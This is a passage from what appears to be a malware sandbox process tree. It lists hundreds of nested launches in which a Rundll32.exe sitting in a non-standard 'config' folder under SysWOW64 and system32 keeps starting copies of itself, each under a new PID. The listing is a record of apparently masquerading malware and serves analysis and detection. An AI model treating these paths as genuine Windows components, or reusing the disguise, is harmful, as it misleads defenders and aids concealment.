        "C:\Windows\system32\config\Rundll32.exe"
        451⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        452⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        453⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        454⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        455⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        456⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        457⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        458⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        459⤵
        
        PID:972
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        460⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        461⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        462⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        463⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        464⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        465⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        466⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        467⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        468⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        469⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        470⤵
        
        PID:4900
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        471⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        472⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        473⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        474⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        475⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        476⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        477⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        478⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        479⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        480⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        481⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        482⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        483⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        484⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        485⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        486⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        487⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        488⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        489⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        490⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        491⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        492⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        493⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        494⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        495⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        496⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        497⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        498⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        499⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        500⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        501⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        502⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        503⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        504⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        505⤵
        
        PID:932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        506⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        507⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        508⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        509⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        510⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        511⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        512⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        513⤵
        
        PID:3276
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        514⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        515⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        516⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        517⤵
        
        PID:776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        518⤵
        
        PID:416
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        519⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        520⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        521⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        522⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        523⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        524⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        525⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        526⤵
        
        PID:972
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        527⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        528⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        529⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        530⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        531⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        532⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        533⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        534⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        535⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        536⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        537⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        538⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        539⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        540⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        541⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        542⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        543⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        544⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        545⤵
        
        PID:3104
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        546⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        547⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        548⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        549⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        550⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        551⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        552⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        553⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        554⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        555⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        556⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        557⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        558⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        559⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        560⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        561⤵
        
        PID:2128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        562⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        563⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        564⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        565⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        566⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        567⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        568⤵
        
        PID:440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        569⤵
        
        PID:228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        570⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        571⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        572⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        573⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        574⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        575⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        576⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        577⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        578⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        579⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        580⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        581⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        582⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        583⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        584⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        585⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        586⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        587⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        588⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        589⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        590⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        591⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        592⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        593⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        594⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        595⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        596⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        597⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        598⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        599⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        600⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        601⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        602⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        603⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        604⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        605⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        606⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        607⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        608⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        609⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        610⤵
        
        PID:676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        611⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        612⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        613⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        614⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        615⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        616⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        617⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        618⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        619⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        620⤵
        
        PID:232
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        621⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        622⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        623⤵
        
        PID:972
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        624⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        625⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        626⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        627⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        628⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        629⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        630⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        631⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        632⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        633⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        634⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        635⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        636⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        637⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        638⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        639⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        640⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        641⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        642⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        643⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        644⤵
        
        PID:808
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        645⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        646⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        647⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        648⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        649⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        650⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        651⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        652⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        653⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        654⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        655⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        656⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        657⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        658⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        659⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        660⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        661⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        662⤵
        
        PID:772
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        663⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        664⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        665⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        666⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        667⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        668⤵
        
        PID:4148
